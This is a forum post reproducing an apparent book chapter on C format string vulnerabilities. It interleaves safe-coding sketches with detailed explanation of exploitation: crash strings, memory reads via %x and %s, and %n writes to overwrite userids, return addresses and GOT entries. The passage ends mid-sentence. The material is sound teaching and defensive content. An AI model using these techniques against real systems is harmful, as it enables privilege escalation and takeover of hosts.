Posted 2004-06-21, 02:37 PM   #9 (permalink)
mic64

Chapter 9 • Format Strings
Introduction
Early in the summer of 2000, the security world was abruptly made aware of a
significant new type of software security vulnerability. This subclass of
vulnerabilities, known as format string bugs, was made public when an exploit
for the Washington University FTP daemon (WU-FTPD) was posted to the Bugtraq
mailing list on June 23, 2000. The exploit allowed remote attackers to gain
root access on hosts running WU-FTPD without authentication if anonymous
FTP was enabled (it was, by default, on many systems). This was a very
high-profile vulnerability because WU-FTPD is in wide use on the Internet.
As serious as it was, the fact that tens of thousands of hosts on the Internet
were instantly vulnerable to complete remote compromise was not the primary
reason that this exploit was such a great shock to the security community. The
real concern was the nature of the exploit and its implications for software
everywhere. This was a completely new method of exploiting programming bugs
previously thought to be benign. This was the first demonstration that format
string bugs were exploitable.
A format string vulnerability occurs when programmers pass externally supplied
data to a printf function as, or as part of, the format string argument. In the
case of WU-FTPD, the argument to the SITE EXEC ftp command when issued
to the server was passed directly to a printf function.
There could not have been a more effective proof of concept; attackers could
immediately and automatically obtain superuser privileges on victim hosts.
Until the exploit was public, format string bugs were considered by most to
be bad programming form (just inelegant shortcuts taken by programmers in a
rush) and nothing to be overly concerned about. Up until that point, the worst
that had occurred was a crash, resulting in a denial of service. The security
world soon learned differently. Countless UNIX systems have been compromised
due to these bugs.
As previously mentioned, format string vulnerabilities were first made public
in June of 2000. The WU-FTPD exploit was written by an individual known as
tf8, and was dated October 15, 1999. Assuming that this vulnerability was how
it was discovered that format string bugs could be exploited, hackers had
more than eight months to seek out and write exploits for format string bugs in
other software. This is a conservative guess, based on the assumption that the
WU-FTPD vulnerability was the first format string bug to be exploited. There is
no reason to believe that is the case; the comments in the exploit do not suggest
that the author discovered this new method of exploitation.
www.syngress.com
Shortly after knowledge of format string vulnerabilities was public, exploits
for several programs became publicly available. As of this writing, there are
dozens of public exploits for format string vulnerabilities, plus an unknown
number of unpublished ones.
As for their official classification, format string vulnerabilities do not really
deserve their own category among other general software flaws such as race conditions
and buffer overflows. Format string vulnerabilities really fall under the
umbrella of input validation bugs: the basic problem is that programmers fail to
prevent untrusted externally supplied data from being included in the format
string argument.
Format String Vulnerabilities versus Buffer Overflows
On the surface, format string and buffer overflow exploits often look
similar. It is not hard to see why some may group them together in the same
category. Although attackers may overwrite return addresses or function
pointers and use shellcode to exploit either one, buffer overflows and format
string vulnerabilities are fundamentally different problems.
In a buffer overflow vulnerability, the software flaw is that a sensitive
routine such as a memory copy relies on an externally controllable
source for the bounds of data being operated on. For example, many
buffer overflow conditions are the result of C library string copy operations.
In the C programming language, strings are NULL terminated byte
arrays of variable length. The strcpy() (string copy) libc function copies
bytes from a source string to a destination buffer until a terminating
NULL is encountered in the source string. If the source string is externally
supplied and greater in size than the destination buffer, the strcpy()
function will write to memory neighboring the data buffer until the copy
is complete. Exploitation of a buffer overflow is based on the attacker
being able to overwrite critical values with custom data during operations
such as a string copy.
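As a minimal sketch of the bounds problem just described, the following C fragment shows a copy that checks the source length against the destination size before writing. The helper name copy_bounded and its return convention are illustrative assumptions, not code from any program discussed in this chapter.

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: copy src into dst only if it fits, including the
 * terminating NUL. Returns 0 on success, -1 if src is too long.
 * An unchecked strcpy(dst, src) would instead keep writing past dst.
 */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);

    if (dst_size == 0 || len >= dst_size)
        return -1;              /* would overflow: refuse the copy */

    memcpy(dst, src, len + 1);  /* len bytes plus the NUL terminator */
    return 0;
}
```

With a 16-byte destination, copy_bounded(buf, sizeof buf, "short") succeeds, while a 27-character source is rejected rather than spilling into neighboring memory.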
In format string vulnerabilities, the problem is that externally supplied
data is being included in the format string argument. This can be
considered a failure to validate input and really has nothing to do with
data boundary errors. Hackers exploit format string vulnerabilities to
write specific values to specific locations in memory. In buffer overflows,
the attacker cannot choose where memory is overwritten.
Another source of confusion is that buffer overflows and format
string vulnerabilities can both exist due to the use of the sprintf() function.
To understand the difference, it is important to understand what
the sprintf function actually does. sprintf() allows a programmer to
create a string using printf() style formatting and write it into a buffer.
Buffer overflows occur when the string that is created is somehow larger
than the buffer it is being written to. This is often the result of the use
of the %s format specifier, which embeds a NULL-terminated string of
variable length in the formatted string. If the variable corresponding to
the %s token is externally supplied and it is not truncated, it can cause
the formatted string to overwrite memory outside of the destination
buffer when it is written. The format string vulnerabilities due to the
misuse of sprintf() are due to the same error as any other format string
bug: externally supplied data being interpreted as part of the format
string argument.
Notes from the Underground…
This chapter will introduce you to format string vulnerabilities, why they
exist, and how they can be exploited by attackers. We will look at a real-world
format string vulnerability, and walk through the process of exploiting it as a
remote attacker trying to break into a host.
Understanding Format String Vulnerabilities
To understand format string vulnerabilities, it is necessary to understand what the
printf functions are and how they function internally.
Computer programmers often require the ability for their programs to create
character strings at runtime. These strings may include variables of a variety of
types, the exact number and order of which are not necessarily known to the
programmer during development. The widespread need for flexible string creation
and formatting routines naturally led to the development of the printf
family of functions. The printf functions create and output strings formatted at
runtime. They are part of the standard C library. Additionally, the printf
functionality is implemented in other languages (such as Perl).
These functions allow a programmer to create a string based on a format
string and a variable number of arguments. The format string can be considered a
blueprint containing the basic structure of the string and tokens that tell the printf
function what kinds of variable data go where, and how they should be formatted.
The printf tokens are also known as format specifiers; the two terms are used
interchangeably in this chapter.
The concept behind printf functions is best demonstrated with a small
example:
#include <stdio.h>

int main(void)
{
    int integer = 10;
    /* %i is replaced by the base-10 text of integer */
    printf("this is the skeleton of the string, %i", integer);
    return 0;
}
The printf Functions
This is a list of the standard printf functions included in the standard C
library. Each of these can lead to an exploitable format string vulnerability
if misused.
• printf() This function allows a formatted string to be created
  and written to the standard out I/O stream.
• fprintf() This function allows a formatted string to be created
  and written to a libc FILE I/O stream.
• sprintf() This function allows a formatted string to be created
  and written to a location in memory. Misuse of this
  function often leads to buffer overflow conditions.
• snprintf() This function allows a formatted string to be created
  and written to a location in memory, with a maximum
  string size. In the context of buffer overflows, it is known as
  a secure replacement for sprintf().
The standard C library also includes the vprintf(), vfprintf(),
vsprintf(), and vsnprintf() functions. These perform the same functions
as their counterparts listed previously but accept varargs (variable arguments)
structures as their arguments.
Tools & Traps…
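To make the difference between sprintf() and snprintf() in this list concrete, here is a small hedged sketch. The helper format_user and the "user=" prefix are invented for illustration; the only library behavior relied on is that snprintf() never writes more than the given size and returns the length it would have needed.

```c
#include <stdio.h>

/*
 * Hypothetical helper: format "user=<name>" into out.
 * Returns 1 if the whole string fit, 0 if it was truncated or an error
 * occurred. The name is passed as an argument to %s, never as the
 * format string itself.
 */
int format_user(char *out, size_t out_size, const char *name)
{
    int needed = snprintf(out, out_size, "user=%s", name);

    /* snprintf returns the length it wanted to write, excluding the NUL */
    return needed >= 0 && (size_t)needed < out_size;
}
```

Note that a bounded write only addresses the overflow problem. The second property, keeping external data out of the format string argument, comes from the constant "user=%s" literal.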
In the short main() example shown earlier, the programmer is calling printf with
two arguments: a format string and a variable that is to be embedded in the
string when that instance of printf executes.
"this is the skeleton of the string, %i"
This format string argument consists of static text and a token (%i), indicating
variable data. In this example, the value of this integer variable will be included,
in base-10 character representation, after the comma in the string output when
the function is called.
The following program output demonstrates this (the value of the integer
variable is 10):
[dma@victim server]$ ./format_example
this is the skeleton of the string, 10
Because the function does not know how many arguments it will receive,
they are read from the process stack as the format string is processed, based on
the data type of each token. In the previous example, a single token representing
an integer variable was embedded in the format string. The function expects a
variable corresponding to this token to be passed to the printf function as the
second argument. On the Intel architecture (at least), arguments to functions are
pushed onto the stack before the stack frame is created. When the function
references its arguments on these platforms, it references data on the stack
beneath the stack frame.
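The point that the format string alone decides how many arguments are fetched can be sketched with a toy variadic function. This is not how any real printf is implemented; sum_by_format is a made-up name, and it recognizes only the %i token.

```c
#include <stdarg.h>

/*
 * Toy illustration (not the real printf): every "%i" in fmt makes the
 * function fetch one more int from its variable arguments. Nothing tells
 * it how many arguments the caller really passed; the format string is
 * the only guide.
 */
int sum_by_format(const char *fmt, ...)
{
    va_list ap;
    int total = 0;

    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0'; p++) {
        if (p[0] == '%' && p[1] == 'i') {
            total += va_arg(ap, int);   /* one argument consumed per token */
            p++;                        /* skip the 'i' */
        }
    }
    va_end(ap);
    return total;
}
```

Calling sum_by_format("%i and %i", 10, 32) fetches two integers. If the format named more tokens than the caller supplied, va_arg would simply read whatever lies next, which is undefined behavior in C and is the root of the problem this chapter describes.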
NOTE
In this chapter, we use the term beneath to describe data that was
placed on the stack before the data we are suggesting is above. On the
Intel architecture, the stack grows down. On this and other architectures
with stacks that grow down, the address of the top of the stack
decreases numerically as the stack grows. On these systems, data that is
described as beneath the other data on the stack has a numerically
higher address than data above it.
The fact that numerically higher memory addresses may be lower in
the stack can cause confusion. Be aware that a location in the stack
described as above another means that it is closer to the top of the stack
than the other location.
In our example, an argument was passed to the printf function corresponding
to the %i token: the integer variable. The base-10 character representation of
the value of this variable (10) was output where the token was placed in the
format string.
When creating the string that is to be output, the printf function will retrieve
whatever value of integer data type size is at the right location in the stack and use
that as the variable corresponding to the token in the format string. The printf
function will then convert the binary value to a character representation based on
the format specifier and include it as part of the formatted output string. As will be
demonstrated, this occurs regardless of whether the programmer has actually passed
a second argument to the printf function or not. If no parameters corresponding to
the format string tokens were passed, data belonging to the calling function(s) will
be treated as the arguments, because that is what is next on the stack.
Let's go back to our example, pretending that we had later decided to print
only a static string but forgot to remove the format specifier. The call to printf
now looks like this:
printf("this is the skeleton of the string, %i");
/* note: no argument. only a format string. */
When this function executes, it does not know that there has not been a variable
passed corresponding to the %i token. When creating the string, the function
will read an integer from the area of the stack where a variable would be had it
been passed by the programmer: the 4 bytes beneath the stack frame. Provided
that the virtual memory where the argument should be can be dereferenced, the
program will not crash and whatever bytes happened to be at that location will
be interpreted as, and output as, an integer.
The following program output demonstrates this:
[dma@victim server]$ ./format_example
this is the skeleton of the string, -1073742952
Recall that no variable was passed as an integer argument corresponding to
the %i format specifier; however, an integer was included in the output string.
The function simply reads bytes that make up an integer from the stack as
though they were passed to the function by the programmer. In this example, the
bytes in memory happened to represent the number -1073742952 as a signed int
data type in base 10.
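The number in that output is easier to recognize in hexadecimal. The sketch below reinterprets a 32-bit pattern as a signed integer; as_signed32 is a hypothetical helper. The observation that -1073742952 corresponds to 0xBFFFFB98, which resembles a stack address on 32-bit Linux systems of that period, is an inference from the arithmetic and not something the source states.

```c
#include <stdint.h>
#include <string.h>

/*
 * Reinterpret a 32-bit pattern as a signed integer, the way %i treats
 * whatever word it finds. memcpy avoids an implementation-defined cast.
 */
int32_t as_signed32(uint32_t bits)
{
    int32_t value;

    memcpy(&value, &bits, sizeof value);
    return value;
}
```

The check is simple arithmetic: 0xBFFFFB98 is 3221224344 unsigned, and 3221224344 - 4294967296 = -1073742952.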
If users can force their own data to be part of the format string, they can cause
the affected printf function to treat whatever happens to be on the stack as
legitimate variables associated with format specifiers that they supply.
As we will see, the ability of an external source to control the internal behavior
of a printf function can lead to some serious potential security vulnerabilities.
If a program exists that contains such a bug and returns the formatted string to
the user (after accepting format string input), attackers can read possibly sensitive
memory contents. Memory can also be written to through malicious format
strings by using the obscure format specifier %n. The purpose of the %n token is
to allow programmers to obtain the number of characters output at predetermined
points during string formatting. How attackers can exploit format string
vulnerabilities will be explained in detail as we work toward developing a functional
format string exploit.
Why and Where Do Format String Vulnerabilities Exist?
Format string vulnerabilities are the result of programmers allowing externally
supplied, unsanitized data in the format string argument. The following are some
of the most commonly seen programming mistakes resulting in exploitable format
string vulnerabilities.
The first is where a printf function is called with no separate format string
argument, simply a single string argument. For example:
printf(argv[1]);
In this example, argv[1], the second element of the argument vector (normally
the first command-line argument), is passed to printf() as the format string. If
format specifiers have been included in the argument, they will be acted upon by
the printf function:
[dma@victim]$ ./format_example %i
-1073742936
This mistake is usually made by newer programmers, and is due to unfamiliarity
with the C library string processing functions. Sometimes this mistake is
due to the programmer's laziness, neglecting to include a format string argument
for the string (i.e., %s). Laziness of this kind is often the underlying cause of
many different types of security vulnerabilities in software.
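For contrast with the printf(argv[1]) mistake, a minimal sketch of the corrected call follows. The wrapper name print_user_text is an assumption made for illustration; the essential part is the constant "%s" format.

```c
#include <stdio.h>

/*
 * The user's text is an ARGUMENT to a constant "%s" format, so any
 * '%' sequences inside it are printed literally instead of being acted on.
 * Returns the number of characters written (or a negative value on error).
 */
int print_user_text(FILE *stream, const char *text)
{
    return fprintf(stream, "%s", text);
}
```

A main() that checks argc and then calls print_user_text(stdout, argv[1]) would echo an argument such as %i unchanged. fputs(text, stream) is an equally valid choice when no formatting is needed at all.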
The use of wrappers for printf() style functions, often for logging and error
reporting functions, is very common. When developing, programmers may forget
that an error message function calls printf() (or another printf function) at some
point with the variable arguments it has been passed. They may simply become
accustomed to calling it as though it prints a single string:
error_warn(errmsg);
The vulnerability that we are going to exploit in this chapter is due to an
error similar to this.
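The following is a hedged sketch of what such a wrapper typically looks like and how to call it safely. The body of error_warn here is an assumption (the source shows only the call), report_message is a made-up helper, and the format attribute is a GCC/Clang extension that is skipped on other compilers.

```c
#include <stdarg.h>
#include <stdio.h>

/*
 * Hypothetical logging wrapper in the style described above. Where the
 * compiler supports it, the format attribute lets it check callers'
 * format strings against their arguments.
 */
int error_warn(const char *fmt, ...)
#if defined(__GNUC__)
    __attribute__((format(printf, 1, 2)))
#endif
    ;

int error_warn(const char *fmt, ...)
{
    va_list ap;
    int written;

    va_start(ap, fmt);
    written = vfprintf(stderr, fmt, ap);   /* fmt is interpreted here */
    va_end(ap);
    return written;
}

/* Safe way to report a message that may contain external data. */
int report_message(const char *errmsg)
{
    return error_warn("%s", errmsg);       /* not error_warn(errmsg) */
}
```

With the attribute in place, GCC and Clang can warn about a call such as error_warn(errmsg) when format-security warnings are enabled, which catches the mistake at compile time.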
One of the most common causes of format string vulnerabilities is improper
calling of the syslog() function on UNIX systems. syslog() is the programming
interface for the system log daemon. Programmers can use syslog() to write error
messages of various priorities to the system log files. As its string arguments,
syslog() accepts a format string and a variable number of arguments corresponding
to the format specifiers. (The first argument to syslog() is the syslog priority level.)
Many programmers who use syslog() forget or are unaware that a format string
separate from externally supplied log data must be passed. Many format string
vulnerabilities are due to code that resembles this:
syslog(LOG_AUTH,errmsg);
If errmsg contains externally supplied data (such as the username of a failed
login attempt), this condition can likely be exploited as a typical format string
vulnerability.
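A corrected form of the syslog() call might look like the sketch below. The function name log_failed_login, the message text, and the choice of LOG_WARNING are assumptions for illustration. Note also that in the POSIX interface LOG_AUTH is a facility, which is normally OR-ed with a severity level such as LOG_WARNING.

```c
#include <stdio.h>
#include <syslog.h>

/*
 * Hypothetical example: log a failed login without letting the username
 * act as a format string. Returns the length of the message built.
 */
int log_failed_login(const char *username)
{
    char errmsg[256];
    int len = snprintf(errmsg, sizeof errmsg,
                       "failed login for user %s", username);

    /* Constant "%s" format; errmsg is only data. LOG_AUTH is the
       facility and LOG_WARNING the severity. */
    syslog(LOG_AUTH | LOG_WARNING, "%s", errmsg);
    return len;
}
```

A username such as %n%n%n is then recorded in the log verbatim rather than being interpreted.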
How Can They Be Fixed?
Like most security vulnerabilities due to insecure programming, the best solution
to format string vulnerabilities is prevention. Programmers need to be aware that
these bugs are serious and can be exploited by attackers. Unfortunately, a global
awakening to security issues is not likely any time soon.
For administrators and users concerned about the software they run on their
system, a good policy should keep the system reasonably secure. Ensure that all
setuid binaries that are not needed have their permissions removed, and all
unnecessary services are blocked or disabled.
Mike Frantzen published a workaround that could be used by administrators
and programmers to prevent any possible format string vulnerabilities from being
exploitable. His solution involves attempting to compare the number of arguments
passed to a printf() function with the number of % tokens in the format string.
This workaround is implemented as FormatGuard in Immunix, a distribution of
Linux designed to be secure at the application level.
Mike Frantzen's Bugtraq post is archived at
www.securityfocus.com/archive/1/72118. FormatGuard can be found at
www.immunix.org/formatguard.html.
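The counting idea can be illustrated with a simplified sketch. This is not FormatGuard's actual implementation, which is not shown in the source; count_format_args is a hypothetical function that only estimates how many arguments a format string would consume, and it ignores positional specifiers such as %1$d.

```c
#include <stddef.h>
#include <string.h>

/*
 * Simplified sketch of the counting idea: return how many arguments a
 * printf-style format string would consume. "%%" consumes none; a '*'
 * width or precision consumes one extra int.
 */
size_t count_format_args(const char *fmt)
{
    size_t count = 0;

    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '\0')
            break;                       /* lone '%' at end of string */
        if (*p == '%')
            continue;                    /* literal percent sign */
        /* skip flags, width, precision, and length modifiers */
        while (*p != '\0' && strchr("-+ #0123456789.*hlLqjzt", *p) != NULL) {
            if (*p == '*')
                count++;                 /* width/precision taken from args */
            p++;
        }
        if (*p == '\0')
            break;
        count++;                         /* the conversion itself */
    }
    return count;
}
```

A guard built on this could refuse to format when count_format_args(fmt) exceeds the number of arguments actually supplied by the caller.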
How Format String Vulnerabilities Are Exploited
There are three basic goals an attacker can accomplish by exploiting format string
vulnerabilities. First, the attacker can cause a process to fail due to an invalid
memory access. This can result in a denial of service. Second, attackers can read
process memory if the formatted string is output. Finally, memory can be
overwritten by attackers, possibly leading to execution of instructions.
Using Format Strings to Exploit Buffer Overflows
User-supplied format specifiers can also be used to aid in exploiting
buffer overflow conditions. In some situations, an sprintf() condition
exists that would be exploitable if it were not for length limitations
placed on the source strings prior to them being passed to the insecure
function. Due to these restrictions, it may not be possible for an attacker
to supply an oversized string as the format string or the value for a %s
in an sprintf call.
If user-supplied data can be embedded in the format string argument
of sprintf(), the size of the string being created can be inflated by
using padded format specifiers. For example, if the attacker can have
%100i included in the format string argument for sprintf, the output
string may end up more than 100 bytes larger than it should be. The
padded format specifier may create a large enough string to overflow the
destination buffer. This may render the limits placed on the data by the
programmer useless in protecting against overflows and allow for the
exploitation of this condition by an attacker to execute arbitrary code.
We will not discuss this method of exploitation further. Although it
involves using format specifiers to overwrite memory, the format specifier
simply is being used to enlarge the string so that a typical stack overflow
condition can occur. This chapter is for exploitation using only
format specifiers, without relying on another vulnerability due to a separate
programmatic flaw such as buffer overflows. Additionally, the
described situation could also be exploited as a regular format string
vulnerability using only format specifiers to write to memory.
Damage & Defense…
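The inflation effect of a padded specifier can be measured without overflowing anything. In this sketch, formatted_length is a hypothetical helper, and "%*i" takes the width as an argument so that it behaves like the %100i token from the sidebar when called with a width of 100.

```c
#include <stdio.h>

/*
 * Measure how long a formatted string WOULD be, without writing it.
 * Calling snprintf with a NULL buffer and size 0 is permitted by C99
 * and returns the number of characters required (excluding the NUL).
 */
int formatted_length(int width, int value)
{
    return snprintf(NULL, 0, "%*i", width, value);
}
```

A single-digit value therefore occupies 100 characters once padded, which is how a short token can defeat a length limit placed on the input string alone.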
Denial of Service
The simplest way that a format string vulnerability can be exploited is to cause a
denial of service through forcing the process to crash. It is relatively easy to cause
a program to crash with malicious format specifiers.
Certain format specifiers require valid memory addresses as corresponding
variables. One of them is %n, which we just discussed and which we will explain
in further detail soon. Another is %s, which requires a pointer to a NULL-terminated
string. If an attacker supplies a malicious format string containing either of
these format specifiers, and no valid memory address exists where the corresponding
variable should be, the process will fail attempting to dereference whatever
is in the stack. This may cause a denial of service and does not require any
complicated exploit method.
In fact, there were a handful of known problems caused by format strings
that existed before anyone understood that format strings were exploitable. For
example, it was known that it was possible to crash the BitchX IRC client by passing
%s%s%s%s as one of the arguments for certain IRC commands. However, as far as
we know, no one realized this was further exploitable until the WU-FTPD exploit
came to light.
There is not much more to crashing processes using format strings. There are
much more interesting and useful things an attacker can do with format string
vulnerabilities.
Reading Memory
If the output of the format string function is available, attackers can also exploit
these vulnerabilities to read process memory. This is a serious problem and can
lead to disclosure of sensitive information. For example, if a program accepts
authentication information from clients and does not clear it immediately after
use, format string vulnerabilities can be used to read it. The easiest way for an
attacker to read memory due to a format string vulnerability is to have the function
output memory as variables corresponding to format specifiers. These variables
are read from the stack based on the format specifiers included in the
format string. For example, a 4-byte value can be retrieved for each instance of
%x. The limitation of reading memory this way is that only data on the stack
can be reached.
It is also possible for attackers to read from arbitrary locations in memory
by using the %s format specifier. As described earlier, the %s format specifier
corresponds to a NULL-terminated string of characters. This string is passed by
reference. An attacker can read memory in any location by supplying a %s format
specifier and a corresponding address variable to the vulnerable program. The
address where the attacker would like reading to begin must also be placed in the
stack in the same manner that the address corresponding to any %n variables
would be embedded. The presence of a %s format specifier would cause the
format string function to read in bytes starting at the address supplied by the
attacker until a NULL byte is encountered.
The ability to read memory is very useful to attackers and can be used in
conjunction with other methods of exploitation. How to do this will be
described in detail and will be used in the exploit we are developing toward the
end of this chapter.
Writing to Memory
Previously, we touched on the %n format specifier. This formerly obscure token
exists for the purpose of indicating how large a formatted string is at runtime.
The variable corresponding to %n is an address. When the %n token is encountered
during printf processing, the number (as an integer data type) of characters
that make up the formatted output string so far is written to the address argument
corresponding to the format specifier.
The existence of such a format specifier has serious security implications: it
can allow for writes to memory. This is the key to exploiting format string
vulnerabilities to accomplish goals such as executing shellcode.
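For reference, this is what a legitimate use of %n looks like, with a constant format string and a real pointer argument supplied by the program. The function name chars_before_marker and the "-suffix" text are invented for the example. It assumes a C library that honors %n; some hardened libraries restrict or disable it.

```c
#include <stdio.h>

/*
 * Legitimate use of %n: record how many characters had been produced at
 * the point where the token appears. The format string is a constant and
 * &count is a real argument supplied by the program.
 */
int chars_before_marker(const char *word)
{
    char buf[64];
    int count = -1;

    snprintf(buf, sizeof buf, "%s%n-suffix", word, &count);
    return count;
}
```

The security problem arises only when the attacker, rather than the programmer, decides where the %n appears and which address it is paired with.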
Single Write Method
The first method that we will talk about involves using only the value of a single
%n write to elevate privileges.
In some programs, critical values such as a user's userid or groupid are stored in
process memory for purposes of lowering privileges. Format string vulnerabilities
can be exploited by attackers to corrupt these variables.
An example of a program with such a vulnerability is the Screen utility.
Screen is a popular UNIX utility that allows multiple processes to use a single
pseudoterminal. When installed setuid root, Screen stores the privileges of the
invoking user in a variable. When a window is created, the Screen parent process
lowers privileges to the value stored in that variable for the child processes
(the user shell, etc.).
Versions of Screen prior to and including 3.9.5 contained a format string
vulnerability when outputting the user-definable visual bell string. This string,
defined in the user's .screenrc configuration file, is output to the user's terminal as
the interpretation of the ASCII beep character. When output, user-supplied data
from the configuration file is passed to a printf function as part of the format
string argument.
Due to the design of Screen, this particular format string vulnerability could
be exploited with a single %n write. No shellcode or construction of addresses
was required. The idea behind exploiting Screen is to overwrite the saved userid
with one of the attacker's choice, such as 0 (root's userid).
To exploit this vulnerability, an attacker had to place the address of the saved
userid in memory reachable as an argument by the affected printf function. The
attacker must then create a string that places a %n at the location where a
corresponding address has been placed in the stack. The attacker can offset the
target address by 2 bytes and use the most significant bits of the %n value to
zero-out the userid. The next time a new window is created by the attacker, the
Screen parent process would set the privileges of the child to the value that has
replaced the saved userid.
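The 2-byte offset trick is easier to follow as byte arithmetic. The sketch below is a pure simulation on a local array and performs no %n write. It rests on assumptions the source does not spell out: a 32-bit little-endian userid, a 32-bit count, and a write aimed 2 bytes below the userid. The function name is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Simulation only: "mem" stands in for process memory, with a 32-bit
 * saved userid at byte offset uid_off (little-endian layout assumed,
 * as on Intel). A %n-style write stores a 32-bit count; aiming it 2 bytes
 * below the userid makes the count's two high bytes land on the userid's
 * two low bytes.
 */
uint32_t uid_after_offset_write(uint32_t uid, uint32_t count)
{
    uint8_t mem[8] = {0};
    const size_t uid_off = 4;
    uint32_t result = 0;

    /* store uid at offset 4, least significant byte first */
    for (int i = 0; i < 4; i++)
        mem[uid_off + i] = (uint8_t)(uid >> (8 * i));

    /* the simulated write: 4 bytes of count starting at uid_off - 2 */
    for (int i = 0; i < 4; i++)
        mem[uid_off - 2 + i] = (uint8_t)(count >> (8 * i));

    /* read the userid back */
    for (int i = 0; i < 4; i++)
        result |= (uint32_t)mem[uid_off + i] << (8 * i);
    return result;
}
```

Under these assumptions, any count below 65536 has zero high bytes, so a userid such as 1000 becomes 0. The two bytes just below the userid are clobbered as a side effect, and a userid of 65536 or more would keep its upper half.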
By exploiting the format string vulnerability in Screen, it was possible for
local attackers to elevate to root privileges. The vulnerability in Screen is a good
example of how trivially some programs can be exploited through format string
vulnerabilities. The method described is largely platform independent as well.
Multiple Writes Method
Now we move on to using multiple writes to locations in memory. This is
slightly more complicated but has more interesting results. Through format string
vulnerabilities it is often possible to replace almost any value in memory with
whatever the attacker likes. To explain this method, it is important to understand
the %n parameter and what gets written to memory when it is encountered in a
format string.
To recap, the purpose of the %n format specifier is to store the number of
characters output so far in the formatted string. An attacker can force this
value to be large, but often not large enough to be a valid memory address (for
example, a pointer to shellcode). For this reason, it is not possible to
replace such a value with a single %n write. To get around this, attackers can use
successive writes to construct the desired word byte by byte. By using this
technique, a hacker can overwrite almost any value with arbitrary bytes. This is how
arbitrary code is executed.
How Format String Exploits Work
Let's now investigate how format string vulnerabilities can be exploited to
overwrite values such as memory addresses with whatever the attacker likes. It is
through this method that hackers can force vulnerable programs to execute shellcode.
Recall that when the %n parameter is processed, an integer is written to a
location in memory. The address of the value to be overwritten must be in the
stack where the printf function expects a variable corresponding to a %n format
specifier to be. An attacker must somehow get an address into the stack and then
write to it by placing %n at the right location in their malicious format string.
Sometimes this is possible through various local variables or other program-specific
conditions where user-controllable data ends up in the stack.
There is usually an easier and more consistently available way for an attacker
to specify their target address. In most vulnerable programs, the user-supplied
format string passed to a printf function exists in a local variable on the stack
itself. Provided that there is not too much data in local variables, the format
string is usually not too far away from the stack frame belonging to the affected
printf function call. Attackers can force the function to use an address of their
choosing if they include it in their format string and place a %n token at the
right location.
Attackers have the ability to control where the printf function reads the
address variable corresponding to %n. By using other format specifiers, such as
%x or %p, the stack can be traversed or "eaten" by the printf function until it
reaches the address embedded in the stack by the attacker. Provided that user data
making up the format string variable isn't truncated, attackers can cause printf to
read in as much of the stack as is required, until printf() reads as variables
addresses they have placed in the stack. At those points they can place %n
specifiers that will cause data to be written to the supplied addresses.
NOTE
There cannot be any NULL bytes in the address if it is in the format string
(except as the terminating byte), as the string is a NULL-terminated array
just like any other in C. This does not mean that addresses containing
NULL bytes can never be used: addresses can often be placed in the
stack in places other than the format string itself. In these cases it may
be possible for attackers to write to addresses containing NULL bytes.
For example, an attacker who wishes to use an address stored 32 bytes away
from where a printf() function reads its first variable can use 8 %x format
specifiers. The %x token outputs the value, in base-16 character representation,
of a 4-byte word on 32-bit Intel systems. For each instance of %x in the format
string, the printf function reads 4 bytes deeper into the stack for the
corresponding variable. Attackers can use other format specifiers to push printf()
into reading their data as variables corresponding to the %n specifier.
Once an address is read by printf() as the variable corresponding to a %n
token, the number of characters output in the formatted string at that point will
be stored there as an integer. This value will overwrite whatever exists at the
address (assuming it is a valid address and writeable memory).
Constructing Values
An attacker can manipulate the value of the integer that is written to the target
address. Hackers can use the padding functionality of printf to expand the number
of characters to be output in the formatted string.
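/* test.c */
#include <stdio.h>

int main(void)
{
    /* %10i pads the integer to a minimum width of 10 characters */
    printf("start: %10i end\n", 10);
    return 0;
}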
In the preceding example, the %10i token in the format string is an integer
format specifier containing a padding value. The padding value tells the printf()
function to use 10 characters when representing the integer in the formatted
string.
[dma@victim server]$ ./test
start:         10 end
The decimal representation of the number 10 does not require 10 characters,
so by default the extra ones are spaces. This feature of printf() can be used by
attackers to inflate the value written as %n without having to create an
excessively long format string. Although it is possible to write larger numbers,
the values attackers wish to write are often much larger than can be created
using padded format specifiers.
By using multiple writes through multiple %n tokens, attackers can use the
least significant bytes of the integer values being written to write each byte
of the target value separately. This allows a word such as an address to be
constructed from the relatively low numerical values that %n can write. To
accomplish this, attackers must supply a separate address for each write, with
each address after the first one byte higher than the one before it.
By using four %n writes and supplying four addresses, the low-order bits of
the integers being written are used to write each byte value in the target word
(see Figure 9.1).
On some platforms (such as RISC systems), writes to memory addresses not
aligned on a 2-byte boundary are not permitted. This problem can be solved in
many cases by using short integer writes using the %hn format specifier.
Figure 9.1 Address Being Constructed Using Four Writes
Constructing custom values using successive writes is the most serious
method of exploitation, as it allows for attackers to gain complete control over
the process. This can be accomplished by overwriting pointers to instructions
with pointers to attacker-supplied shellcode. If an attacker exploits a
vulnerability this way, the flow of program execution can be modified such that
the shellcode is executed by the process.
What to Overwrite
With the ability to construct any value at almost any location in memory, the
question is now "what should be overwritten?" Given that nearly any address can
be used, the hacker has many options. The attacker can overwrite function return
addresses, which is the same thing done when stack-based buffer overflows are
exploited. By overwriting the current function return address, shellcode can be
executed when the function returns. Unlike overflows, attackers are not limited
to return addresses, though.
Overwriting Return Addresses
Most stack-based buffer overflow vulnerabilities involve the attacker replacing the
function return address with a pointer to other instructions. When the function
that has been corrupted finishes and attempts to return to the calling block of
code, it instead jumps to wherever the replacement return address points. The
reason that attackers exploiting stack overflows overwrite return addresses is
because that is usually all that can be overwritten. The attacker does not get a
choice of where their data ends up, as it is usually copied over data neighboring
the affected buffer. Format string vulnerabilities differ in that the write occurs at
the location specified by the address corresponding to the %n specifier. An
attacker exploiting a format string vulnerability can overwrite a function return
address by explicitly addressing one of the target addresses. When the function
returns, it will return to the address constructed by the attacker's %n writes.
There are two possible problems that attackers face when overwriting function
return addresses. The first is situations where a function simply does not
return. This is common in format string vulnerabilities because many of them
involve printing error output. The program may simply output an error message
(with the externally supplied data passed as the format string argument) and call
exit() to terminate the program. In these conditions, overwriting a return address
for anything other than the printf function itself will not work. The second
problem is that overwriting return addresses can be caught by
anti-buffer-overflow mechanisms such as StackGuard.
Overwriting Global Offset Table Entries and Other Function Pointers
The global offset table (GOT) is the section of an ELF program that contains
pointers to library functions used by the program. Attackers can overwrite GOT
entries with pointers to shellcode that will execute when the library functions
are called.
Not all binaries being exploited are of the ELF format. This leaves general
function pointers, which are easy targets for programs that use them. Function
